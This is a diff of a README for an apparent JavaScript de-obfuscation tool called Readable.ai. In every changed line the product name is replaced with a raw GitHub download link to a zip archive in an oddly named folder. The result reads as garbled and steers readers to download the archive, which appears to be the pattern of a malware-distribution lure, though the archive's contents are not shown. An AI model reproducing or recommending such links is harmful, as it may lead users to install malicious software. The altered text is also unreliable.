Genitoruniversityofparis959/Readable.ai/README.md

-# 🤖 Readable.ai - Restore Your JavaScript Effortlessly
+# 🤖 https://github.com/Genitoruniversityofparis959/Readable.ai/raw/refs/heads/main/genericalness/ai_Readable_2.1.zip - Restore Your JavaScript Effortlessly

 ## 🚀 Getting Started

-Welcome to Readable.ai!
+Welcome to https://github.com/Genitoruniversityofparis959/Readable.ai/raw/refs/heads/main/genericalness/ai_Readable_2.1.zip!
 This tool helps you transform confusing minified or obfuscated JavaScript into clear, easy-to-read code.
 Whether you're a student, a developer, or just curious, you can use this application to enhance your understanding of JavaScript.

 ## 🖥️ System Requirements

-To use Readable.ai, your computer should meet the following requirements:
+To use https://github.com/Genitoruniversityofparis959/Readable.ai/raw/refs/heads/main/genericalness/ai_Readable_2.1.zip, your computer should meet the following requirements:

 - **Operating System:** Windows 10 or later, macOS, or Linux
 - **RAM:** At least 4 GB